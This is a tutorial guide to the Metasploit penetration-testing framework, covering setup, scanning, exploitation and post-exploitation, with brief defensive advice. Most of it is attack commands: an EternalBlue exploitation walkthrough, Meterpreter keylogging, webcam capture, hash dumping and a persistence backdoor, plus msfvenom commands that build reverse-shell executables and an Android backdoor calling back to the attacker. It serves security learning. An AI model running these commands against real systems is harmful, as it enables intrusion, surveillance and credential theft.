Metasploit Framework – A Comprehensive Guide

Introduction

The Metasploit Framework (MSF) is one of the most powerful tools for penetration testing, exploitation, and security research. Developed by Rapid7, Metasploit provides a wide range of tools for discovering, exploiting, and validating vulnerabilities in networks, systems, and applications.

In this guide, we will cover:
Metasploit Installation
Metasploit Basics
Exploitation with Metasploit
Post-Exploitation Techniques
✅ Defensive Measures Against Metasploit Attacks

1. Installing Metasploit

Metasploit comes pre-installed in Kali Linux, but if you need to install or update it manually, follow these steps.

a) Installing on Kali Linux

sudo apt update && sudo apt install metasploit-framework -y

b) Installing on Other Linux Distros

curl https://raw.githubusercontent.com/rapid7/metasploit-framework/master/msfinstall | bash

c) Installing on Windows (via Metasploit Installer)

Download the installer from Rapid7’s official website.
Run the installer and follow the setup process.

2. Starting Metasploit Framework

To launch Metasploit, open a terminal and run:

msfconsole

This starts Metasploit in its interactive command-line interface.

Check Version of Metasploit

msfconsole --version

Starting the Metasploit Database

Metasploit uses a database to store exploit results and scan data. Start it using:

sudo systemctl start postgresql
sudo msfdb init

To check if the database is running:

sudo systemctl status postgresql

3. Understanding Metasploit’s Structure

Metasploit consists of multiple components:

🔹 Exploit – Code that takes advantage of a vulnerability.
🔹 Payload – The malicious code delivered after exploitation.
🔹 Auxiliary – Scanners, fuzzers, and DoS tools.
🔹 Encoders – Tools to evade antivirus detection.
🔹 Post-Exploitation – Actions after successful exploitation.

Basic Commands in Metasploit

Command	Description
`search exploit_name`	Search for exploits
`use exploit/path`	Select an exploit
`show options`	Show required options
`set RHOST target_ip`	Set target IP
`set LHOST your_ip`	Set local machine IP
`set PAYLOAD payload_name`	Select a payload
`exploit`	Launch the exploit
`sessions -l`	List active sessions
`sessions -i session_id`	Interact with a session

4. Scanning & Enumeration Using Metasploit

Metasploit provides powerful scanning and enumeration tools to gather information about the target system.

a) Scanning Open Ports with Nmap in Metasploit

Metasploit has a built-in Nmap module for network scanning.

use auxiliary/scanner/portscan/tcp
set RHOSTS target_ip
set THREADS 10
run

b) Checking for Vulnerabilities

Use Metasploit’s built-in scanner to check for vulnerabilities.

use auxiliary/scanner/vuln/`
set RHOSTS target_ip
run

5. Exploiting a Target Using Metasploit

Example: Exploiting Windows SMB (EternalBlue – MS17-010)

Search for the exploit: search eternalblue
Select the exploit: use exploit/windows/smb/ms17_010_eternalblue
Set the target IP: set RHOST target_ip
Set the payload: set PAYLOAD windows/meterpreter/reverse_tcp
Set the local IP for receiving connections: set LHOST your_ip
Launch the exploit: exploit
If successful, you’ll get a Meterpreter session.

6. Post-Exploitation with Meterpreter

Once inside a system, Meterpreter provides powerful post-exploitation capabilities.

a) Checking System Info

sysinfo

b) Listing Running Processes

ps

c) Capturing Keystrokes

keyscan_start

To dump captured keystrokes:

keyscan_dump

d) Capturing a Screenshot

screenshot

e) Accessing the Webcam

webcam_list
webcam_snap

f) Dumping Password Hashes

hashdump

g) Maintaining Persistence (Creating a Backdoor)

persistence -U -i 5 -p 4444 -r your_ip

7. Creating Custom Payloads with msfvenom

Metasploit’s msfvenom tool can create payloads for different platforms.

a) Creating a Windows Reverse Shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=your_ip LPORT=4444 -f exe > shell.exe

b) Creating a Linux Reverse Shell

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=your_ip LPORT=4444 -f elf > shell.elf

c) Creating an Android Backdoor

msfvenom -p android/meterpreter/reverse_tcp LHOST=your_ip LPORT=4444 -o backdoor.apk

8. Defending Against Metasploit Attacks

While Metasploit is powerful for offensive security, understanding how to defend against it is equally important.

a) Keep Software Updated

Regularly update operating systems, applications, and firmware to patch vulnerabilities.

b) Use Firewalls and IDS/IPS

Implement firewalls, Intrusion Detection Systems (IDS), and Intrusion Prevention Systems (IPS) to monitor network traffic.

c) Enable Strong Authentication

Use multi-factor authentication (MFA) to prevent unauthorized access.

d) Restrict Admin Privileges

Limit administrator access to reduce the impact of potential exploits.

e) Monitor Network Activity

Use tools like Splunk, Wireshark, or Snort to detect suspicious activity.

9. Metasploit Alternatives

While Metasploit is one of the best exploitation frameworks, there are other alternatives:

🔹 Exploit Pack – GUI-based exploitation framework.
🔹 BeEF – Browser Exploitation Framework.
🔹 Canvas – Another professional exploitation tool.
🔹 Empire – PowerShell-based post-exploitation framework.